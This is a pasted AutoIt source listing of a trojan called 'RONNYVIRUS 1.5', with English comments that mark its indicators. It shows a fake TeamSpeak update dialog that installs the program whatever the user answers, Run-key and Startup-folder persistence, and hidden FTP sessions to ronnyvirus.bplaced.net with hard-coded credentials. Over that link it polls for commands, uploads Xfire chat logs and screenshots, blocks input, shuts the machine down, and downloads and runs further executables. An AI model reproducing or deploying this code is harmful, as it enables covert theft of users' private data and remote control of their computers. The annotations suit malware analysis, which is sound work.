
Untitled

a guest May 19th, 2017 40 Never
  1. ;////////////////////////////////////////////
  2. ;RONNYVIRUS VERSION 1.5 by Daxter and nikeyY'
  3. ;///////////////////////////////////////////
  4. ;NEW IN 1.5: Xfire chat-log stealer
  5. ;Analyst note (added): AutoIt trojan posing as a TeamSpeak update. Indicators in this listing: <Xfire dir>\xfire_updater.exe, HKLM Run value "Xfire Update", staging files under C:\Intel\, hidden ftp.exe sessions to ronnyvirus.bplaced.net
  6. #include <ScreenCapture.au3>
  7. #include <Zip.au3>
  8. AutoItSetOption("TrayIconHide", 1) ; hides the AutoIt tray icon, so the running script shows no tray indicator
  9. ;Read the Xfire install path (Wow6432Node view first, then the native key)
  10. $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
  11. If @error Then
  12.     $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
  13. EndIf
  14. ;Check whether the script was started as the updater ("update" present in the raw command line)
  15. If NOT StringInStr($CmdLineRaw,"update",1) = 0 Then
  16.     update()
  17.     Exit
  18. EndIf
  19. ;Check whether the machine is already infected: this copy is running from <Xfire dir>\xfire_updater.exe
  20. If @ScriptFullPath = $xfire&"\xfire_updater.exe" Then
  21.     get() ; already installed: go straight to the command-polling loop
  22.     Exit
  23. EndIf
  24. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  25. ;Start of the fake TeamSpeak update (decoy dialogs shown to the user; no update is applied in this listing)
  26. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  27. If ProcessExists("TeamSpeak.exe") Then
  28.     MsgBox(16,"Fehler!","Teamspeak sollte während der Installation nicht laufen und wird nun geschlossen.")
  29.     ProcessClose("TeamSpeak.exe")
  30. EndIf
  31. ;Read the TeamSpeak path from the registry
  32. $teamspeak = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\teamspeak\DefaultIcon","")
  33. if @error Then
  34.     MsgBox (16, "TeamSpeak RC2 Update", "TeamSpeak2 wurde nicht erkannt. Stellen Sie sicher, dass TeamSpeak2 installiert ist!")
  35.     infect() ; the install routine runs even when TeamSpeak is not found
  36.     Exit
  37. endif
  38. $msg = MsgBox (36, "TeamSpeak RC2 Update", "Wollen Sie Das Update installieren? ")
  39. ;Progress display of the fake installation: only Sleep/ProgressSet calls, nothing else happens in these loops
  40. if $msg = 6 Then
  41.     ProgressOn("TeamSpeak RC2 Sicherheits-Update", "Update wird installiert . . .", "0 Prozent")
  42.     For $i = 10 to 43 step 1
  43.         sleep(50)
  44.         ProgressSet( $i, $i & " Prozent")
  45.     Next
  46.     For $i = 44 to 80 step 1
  47.         sleep(100)
  48.         ProgressSet( $i, $i & " Prozent")
  49.     Next
  50.     For $i = 81 to 100 step 1
  51.         sleep(30)
  52.         ProgressSet( $i, $i & " Prozent")
  53.     Next
  54.     ProgressSet(100 , "Fertig!", "Update durchgeführt")
  55.     sleep(500)
  56.     ProgressOff()
  57. else
  58.     infect() ; any answer other than 6 to the prompt still leads to the install routine
  59.     Exit
  60. endif
  61. $msg2 = MsgBox (324, "TeamSpeak RC2 Update", "Das Update wurde erfolgreich ausgeführt. Wollen Sie TeamSpeak2 nun starten?")
  62. if $msg2 = 6 Then
  63.     Run($teamspeak)
  64. endif
  65. infect() ; every path through the decoy ends in infect()
  66. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  67. ;End of the fake TeamSpeak update
  68. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  69.  
  70. ;;;;;;;;;;;;;;;;;;;;;;;;
  71. ;Infection of the computer: uploads an initial <COMPUTERNAME>.ini over FTP, copies the script to <Xfire dir>\xfire_updater.exe, sets autostart persistence, starts the copy, then exits
  72. ;;;;;;;;;;;;;;;;;;;;;;;;
  73. Func infect()
  74.     if DirGetSize("C:\Intel\Logs") = -1 Then
  75.         DirCreate("C:\Intel\Logs") ; staging directory; its presence on a host is an indicator
  76.     EndIf
  77.     FileDelete("C:\Intel\log.ini")
  78.     FileDelete("C:\Intel\AnalysisLog.txt")
  79.     ;Create and upload an .ini file ([settings] sleep=5), stored remotely as /<COMPUTERNAME>.ini
  80.     IniWrite("C:\Intel\log.ini","settings","sleep","5")
  81.     FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus") ; first line of the ftp -s: script, presumably the login name
  82.     FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus") ; second line, presumably the password (hard-coded in clear text)
  83.     FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
  84.     FileWriteLine("C:\Intel\AnalysisLog.txt", "put C:\Intel\log.ini /"&@computername&".ini")
  85.     FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
  86.     ProcessClose("ftp.exe") ; closes a process named ftp.exe before starting its own session
  87.     ProcessWaitClose("ftp.exe")
  88.     ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@sw_hide) ; hidden ftp client driven by the script file; this command line is a process-creation indicator
  89.     ProcessWaitClose("ftp.exe")
  90.     FileDelete("C:\Intel\AnalysisLog.txt") ; the script file and the .ini are deleted after the transfer
  91.     FileDelete("C:\Intel\log.ini")
  92.     ;Terminate earlier versions
  93.     ProcessClose("xfire_updater.exe")
  94.     ProcessWaitClose("xfire_updater.exe")
  95.     ;Copy itself into the Xfire folder
  96.     FileCopy(@scriptfullpath,$xfire&"\xfire_updater.exe",9)
  97.     ;Set the registry entry for autostart (HKLM Run key, value name "Xfire Update")
  98.     $var=RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Xfire Update","REG_SZ",$xfire&"\xfire_updater.exe")
  99.     If NOT $var = 1 Then
  100.         FileCreateShortcut($xfire&"\xfire_updater.exe",@startupdir&"\Xfire Updater") ; fallback persistence when RegWrite did not return 1: shortcut "Xfire Updater" in the Startup folder
  101.     EndIf
  102.     ;Run the copied file
  103.     ShellExecute($xfire&"\xfire_updater.exe")
  104.     Exit
  105. EndFunc
  106. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  107. ;End of the infection function
  108. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  109.  
  110. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  111. ;Command polling and execution: repeatedly downloads /<COMPUTERNAME>.ini over FTP and runs each key of its [settings] section as a command; the values come from the remote file and are passed to the calls below without checks
  112. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  113. Func get()
  114.     ;Current version string (compared with the value of the "update" command below)
  115.     $ver = "1.5"
  116.     ;Determine the operating system ($os is not referenced again in the visible listing)
  117.     if @OSVersion = "WIN_XP" Then
  118.         $os = "xp"
  119.     Else
  120.         $os = "vista"
  121.     EndIf
  122.     ;Read the Firefox path from the registry (native and Wow6432Node views)
  123.     $version = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox","CurrentVersion")
  124.     if @error then
  125.         $version = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox","CurrentVersion")
  126.     endif
  127.     $firefox = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\"& $version &"\Main","PathToExe")
  128.     if @error then
  129.         $firefox = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\"& $version &"\Main","PathToExe")
  130.     endif
  131.     ;Read the Xfire install path
  132.     $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
  133.     If @error Then
  134.         $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
  135.     EndIf
  136.     if DirGetSize("C:\Intel\Logs") = -1 Then
  137.         DirCreate("C:\Intel\Logs")
  138.     EndIf
  139.     ;Close a possibly running updater process
  140.     ProcessClose("updater.exe")
  141.     ProcessWaitClose("update.exe")
  142.     ;Delete the updater
  143.     If FileExists("C:\Intel\update.exe") Then
  144.         FileDelete("C:\Intel\update.exe")
  145.     EndIf
  146.     While 1
  147.         ;Fetch the command list from the web space: FTP "get" of /<COMPUTERNAME>.ini into C:\Intel\log.ini
  148.         $settings = 0
  149.         FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus") ; first line of the ftp -s: script, presumably the login name
  150.         FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus") ; second line, presumably the password
  151.         FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
  152.         FileWriteLine("C:\Intel\AnalysisLog.txt", "get /"&@computername&".ini C:\Intel\log.ini")
  153.         FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
  154.         ProcessClose("ftp.exe")
  155.         ProcessWaitClose("ftp.exe")
  156.         ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@SW_HIDE) ; one hidden ftp.exe launch per polling cycle; plain FTP, so the session is visible to network monitoring
  157.         ProcessWaitClose("ftp.exe")
  158.         FileDelete("C:\Intel\AnalysisLog.txt")
  159.         ;Store the command list in a two-dimensional array ([n][0] = command name, [n][1] = argument, [0][0] = entry count)
  160.         $settings = IniReadSection("C:\Intel\log.ini","settings")
  161.         FileDelete("C:\Intel\log.ini")
  162.         ;Check whether the fetch succeeded; if not, get() calls itself again
  163.         If NOT IsArray($settings) Then
  164.             get()
  165.             Exit
  166.         EndIf
  167.         $x = 1
  168.         ;Execute the commands in file order
  169.         While $x < ($settings[0][0] + 1)
  170.             ;Sleep command
  171.             If $settings[$x][0] = "sleep" Then
  172.                 Sleep((Number($settings[$x][1]))*1000) ; argument is multiplied by 1000 before Sleep(); this sets the delay before the next fetch
  173.             EndIf
  174.             ;Link command: opens the given value in a new Firefox tab
  175.             If $settings[$x][0] = "link" Then
  176.                 AutoItSetOption("WinTitleMatchMode",2)
  177.                 Run($firefox&" -new-tab "&$settings[$x][1])
  178.                 ProcessWait("firefox.exe")
  179.                 WinActivate("Mozilla Firefox")
  180.                 WinWaitActive("Mozilla Firefox")
  181.             EndIf
  182.             ;Media player function: restarts wmplayer hidden with the given file name
  183.             If $settings[$x][0] = "media" Then
  184.                 ProcessClose("wmplayer.exe")
  185.                 ProcessWaitClose("wmplayer.exe")
  186.                 ShellExecute("wmplayer",'/Filename "'&$settings[$x][1]&'"',"","open",@SW_Hide)
  187.             EndIf
  188.             ;MsgBox function: shows the given text in a message box
  189.             If $settings[$x][0] = "msg" Then
  190.                 MsgBox(64,"",$settings[$x][1])
  191.             EndIf
  192.             ;CD drive function: passes the given value to CDTray for drives E: to H:
  193.             If $settings[$x][0] = "cd" Then
  194.                 CDTray("E:", $settings[$x][1])
  195.                 CDTray("F:", $settings[$x][1])
  196.                 CDTray("G:", $settings[$x][1])
  197.                 CDTray("H:", $settings[$x][1])
  198.             EndIf
  199.             ;Xfire chat-log upload function: zips %APPDATA%\Xfire\chatlog and uploads it as /chatlogs/<COMPUTERNAME>_xfire.zip (data theft)
  200.             If $settings[$x][0] = "chatlog" and $settings[$x][1] = "xfire" Then
  201.                 FileDelete("C:\Intel\Logs\log.zip")
  202.                 _Zip_Create("C:\Intel\Logs\log.zip")
  203.                 _Zip_AddFolderContents("C:\Intel\Logs\log.zip", @AppDataDir & "\Xfire\chatlog")
  204.                 sleep(3000)
  205.                 FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
  206.                 FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
  207.                 FileWriteLine("C:\Intel\Logs\Log.txt", "binary")
  208.                 FileWriteLine("C:\Intel\Logs\Log.txt", "put C:\Intel\Logs\log.zip /chatlogs/"&@ComputerName&"_xfire.zip")
  209.                 FileWriteLine("C:\Intel\Logs\Log.txt", "bye")
  210.                 ProcessClose("ftp.exe")
  211.                 ProcessWaitClose("ftp.exe")
  212.                 ShellExecute("ftp","-s:C:\Intel\Logs\Log.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
  213.                 ProcessWaitClose("ftp.exe")
  214.                 FileDelete("C:\Intel\Logs\Log.txt") ; staging files are removed after the upload, so they exist on disk only briefly
  215.                 FileDelete("C:\Intel\Logs\log.zip")
  216.             EndIf
  217.             ;Process-closing function: closes the process named in the value
  218.             If $settings[$x][0] = "close" Then
  219.                 ProcessClose($settings[$x][1])
  220.             EndIf
  221.             ;Function to stop polling: the script exits (the autostart entry is not removed here)
  222.             If $settings[$x][0] = "exit" Then
  223.                 Exit
  224.             EndIf
  225.             ;Screenshot function: captures to C:\Intel\Logs\log.jpg and uploads it under /screenshots/<COMPUTERNAME>/ with a timestamped name
  226.             If $settings[$x][0] = "screen" Then
  227.                 _ScreenCapture_SetJPGQuality(Number($settings[$x][1]))
  228.                 _ScreenCapture_Capture("C:\Intel\Logs\log.jpg")
  229.                 FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
  230.                 FileWriteLine("C:\Intel\Logs\Log.txt", "ronnyvirus")
  231.                 FileWriteLine("C:\Intel\Logs\Log.txt", "binary")
  232.                 FileWriteLine("C:\Intel\Logs\Log.txt", "put C:\Intel\Logs\log.jpg /screenshots/"&@ComputerName&"/"&@MDAY&"."&@MON&"-"&@HOUR&"."&@MIN&"."&@SEC&".jpg")
  233.                 FileWriteLine("C:\Intel\Logs\Log.txt", "bye")
  234.                 ProcessClose("ftp.exe")
  235.                 ProcessWaitClose("ftp.exe")
  236.                 ShellExecute("ftp","-s:C:\Intel\Logs\Log.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
  237.                 ProcessWaitClose("ftp.exe")
  238.                 FileDelete("C:\Intel\Logs\Log.txt")
  239.                 FileDelete("C:\Intel\Logs\log.jpg")
  240.             EndIf
  241.             ;Shutdown function
  242.             If $settings[$x][0] = "shutdown" Then
  243.                 Shutdown($settings[$x][1]) ; shutdown code is taken directly from the remote file
  244.             EndIf
  245.             ;Selfkill function (CoD2): blocks user input and sends keystrokes and mouse movement to the foreground window
  246.             If $settings[$x][0] = "selfkill" Then
  247.                 BlockInput(1)
  248.                 Send("{a up}")
  249.                 Send("{w up}")
  250.                 Send("{s up}")
  251.                 Send("{d up}")
  252.                 MouseMove(mousegetpos(0)+50, mousegetpos(1)+2000, 1)
  253.                 sleep (50)
  254.                 Send("^/+frag/-frag")
  255.                 sleep (50)
  256.                 MouseMove(mousegetpos(0)+50, mousegetpos(1)+1000, 80)  
  257.                 Sleep(200)
  258.                 Send("tI AM GAY!"& @CRLF)
  259.                 sleep(1000)
  260.                 BlockInput(0)
  261.             EndIf
  262.             ;Scroll function: blocks input and scrolls the mouse wheel down (value*10) times
  263.             If $settings[$x][0] = "scroll" Then
  264.                 BlockInput(1)
  265.                 $y = ($settings[$x][1]*10)
  266.                 While $y>0
  267.                     MouseWheel("down", 1)
  268.                     Sleep(100)
  269.                     $y = $y - 1
  270.                 WEnd
  271.                 BlockInput(0)
  272.             EndIf
  273.             ;Pause function: overwrites the remote /<COMPUTERNAME>.ini with a file containing only sleep=5
  274.             If $settings[$x][0] = "pause" Then
  275.                 IniWrite("C:\Intel\log.ini","settings","sleep","5")
  276.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
  277.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
  278.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "ascii")
  279.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "put C:\Intel\log.ini /"&@computername&".ini")
  280.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
  281.                 ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@sw_hide)
  282.                 ProcessWaitClose("ftp.exe")
  283.                 FileDelete("C:\Intel\AnalysisLog.txt")
  284.                 FileDelete("C:\Intel\log.ini")
  285.             EndIf
  286.             ;Update function (download and run the new .exe from the web space); taken only when the value differs from $ver. The downloaded file is executed with no integrity check
  287.             If $settings[$x][0] = "update" AND $settings[$x][1] <> $ver Then
  288.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
  289.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "ronnyvirus")
  290.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "binary")
  291.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "get /update/update.exe C:\Intel\update.exe")
  292.                 FileWriteLine("C:\Intel\AnalysisLog.txt", "bye")
  293.                 ProcessClose("ftp.exe")
  294.                 ProcessWaitClose("ftp.exe")
  295.                 ShellExecute("ftp","-s:C:\Intel\AnalysisLog.txt ronnyvirus.bplaced.net","","open",@SW_HIDE)
  296.                 ProcessWaitClose("ftp.exe")
  297.                 FileDelete("C:\Intel\AnalysisLog.txt")
  298.                 FileDelete("C:\Intel\log.ini")
  299.                 If FileExists("C:\Intel\update.exe") Then
  300.                     ShellExecute("C:\Intel\update.exe","update") ; the "update" argument is what the start-up check on $CmdLineRaw looks for
  301.                     ProcessWait("update.exe")
  302.                 EndIf
  303.                 Exit
  304.             EndIf
  305.             $x = $x + 1
  306.         WEnd
  307.         ;End of command execution; the command list is fetched again
  308.     WEnd
  309. EndFunc
  310. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  311. ;End of the polling and execution function
  312. ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
  313.  
  314. ;;;;;;;;;;;;;;;;
  315. ;Update function: replaces <Xfire dir>\xfire_updater.exe with the currently running file, re-applies the autostart entry and starts the new copy
  316. ;;;;;;;;;;;;;;;;
  317. Func update()
  318.     ;Read the Xfire install path
  319.     $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xfire","")
  320.     If @error Then
  321.         $xfire = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Xfire","")
  322.     EndIf
  323.     ;Close the old process
  324.     ProcessClose("xfire_updater.exe")
  325.     ProcessWaitClose("xfire_updater.exe")
  326.     ;Delete the old .exe; if it still exists afterwards, update() calls itself again
  327.     If FileExists($xfire&"\xfire_updater.exe") Then
  328.         FileDelete($xfire&"\xfire_updater.exe")
  329.         If FileExists($xfire&"\xfire_updater.exe") Then
  330.             update()
  331.             Exit
  332.         EndIf
  333.     EndIf
  334.     ;Install the new .exe by copying the running script into the Xfire folder
  335.     FileCopy(@scriptfullpath,$xfire&"\xfire_updater.exe",9)
  336.     ;;Set the registry entry for autostart (HKLM Run key, value name "Xfire Update")
  337.     $var=RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Xfire Update","REG_SZ",$xfire&"\xfire_updater.exe")
  338.     If NOT $var = 1 Then
  339.         FileCreateShortcut($xfire&"\xfire_updater.exe",@startupdir&"\Xfire Updater") ; fallback persistence when RegWrite did not return 1: Startup-folder shortcut "Xfire Updater"
  340.     EndIf
  341.     ;Start the new .exe
  342.     ShellExecute($xfire&"\xfire_updater.exe")
  343. Exit
  344. EndFunc
  345. ;;;;;;;;;;;;;;;;;;;;;;;;;
  346. ;End of the update function
  347. ;;;;;;;;;;;;;;;;;;;;;;;;;